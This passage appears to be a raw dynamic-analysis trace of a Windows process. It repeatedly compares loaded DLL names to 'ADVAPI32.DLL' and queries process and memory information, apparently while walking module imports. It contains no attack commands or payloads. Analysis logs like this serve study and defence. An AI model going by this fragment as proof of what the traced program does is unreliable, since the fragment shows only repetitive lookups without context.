lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-threadpool-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-security-base-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-eventing-provider-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-heap-obsolete-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-privateprofile-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-sidebyside-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-string-obsolete-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-windowserrorreporting-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-quirks-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-util-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-apiquery-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-delayload-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="bcrypt.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="CRYPT32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="OLEAUT32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-security-sddl-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-service-core-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-service-winsvc-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-security-cryptoapi-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-security-lsalookup-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="ext-ms-win-rtcore-ntuser-synch-ext-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="ext-ms-win-rtcore-ntuser-window-ext-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="ext-ms-win-ntuser-misc-l1-5-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="ext-ms-win-ntuser-private-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-ntuser-windowstation-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-gdi-dc-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-gdi-draw-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-gdi-metafile-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-rtcore-gdi-object-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-com-clbcatq-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-com-ole32-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-com-coml2-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-advapi32-msi-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-kernel32-package-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-kernel32-package-current-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-advapi32-psm-app-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-com-psmregister-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-core-winrt-remote-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-com-suspendresiliency-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ole32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="ext-ms-win-appmodel-state-ext-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977df0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977df0000, AllocationBase=0x7ff977df0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.139] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.139] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-heap-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-interlocked-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-io-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-memory-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-string-obsolete-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-heap-obsolete-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-namedpipe-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-string-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-core-threadpool-legacy-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.139] lstrcmpiA (lpString1="api-ms-win-security-base-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-apiquery-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-threadpool-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="KERNELBASE.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-delayload-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="ext-ms-win-core-winrt-remote-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="ext-ms-win-rpc-ssl-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-security-lsalookup-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="SspiCli.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="WS2_32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="IPHLPAPI.DLL", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="ext-ms-win-authz-context-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-security-sddl-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="bcryptPrimitives.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9749b0000, AllocationBase=0x7ff9749b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.140] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.140] lstrcmpiA (lpString1="msvcrt.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="RPCRT4.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-security-base-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-heap-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-localization-private-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-threadpool-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-heap-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-eventing-provider-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-realtime-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-core-delayload-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="WMICLNT.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-devices-query-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] lstrcmpiA (lpString1="api-ms-win-service-private-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.140] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9757b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9757b0000, AllocationBase=0x7ff9757b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.141] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.141] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-heap-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-string-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-eventing-provider-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-security-base-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-string-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-memory-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-privateprofile-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-atoms-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-heap-obsolete-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-string-obsolete-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-localization-obsolete-l1-3-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-stringansi-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] lstrcmpiA (lpString1="api-ms-win-core-sidebyside-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.141] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9774c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9774c0000, AllocationBase=0x7ff9774c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.141] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.141] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975310000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff975310000, AllocationBase=0x7ff975310000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.141] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.141] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977360000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977360000, AllocationBase=0x7ff977360000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.141] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff975900000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff975900000, AllocationBase=0x7ff975900000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974c30000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974c30000, AllocationBase=0x7ff974c30000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff976f80000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff976f80000, AllocationBase=0x7ff976f80000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9776c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9776c0000, AllocationBase=0x7ff9776c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9749a0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9749a0000, AllocationBase=0x7ff9749a0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974980000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974980000, AllocationBase=0x7ff974980000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974a00000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974a00000, AllocationBase=0x7ff974a00000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff974960000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff974960000, AllocationBase=0x7ff974960000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971180000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971180000, AllocationBase=0x7ff971180000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9733b0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9733b0000, AllocationBase=0x7ff9733b0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.142] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.142] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972590000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972590000, AllocationBase=0x7ff972590000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9686c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9686c0000, AllocationBase=0x7ff9686c0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff971f90000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff971f90000, AllocationBase=0x7ff971f90000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.143] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff972bc0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff972bc0000, AllocationBase=0x7ff972bc0000, AllocationProtect=0x80, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0xffffd000)) returned 0x30 [0209.143] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 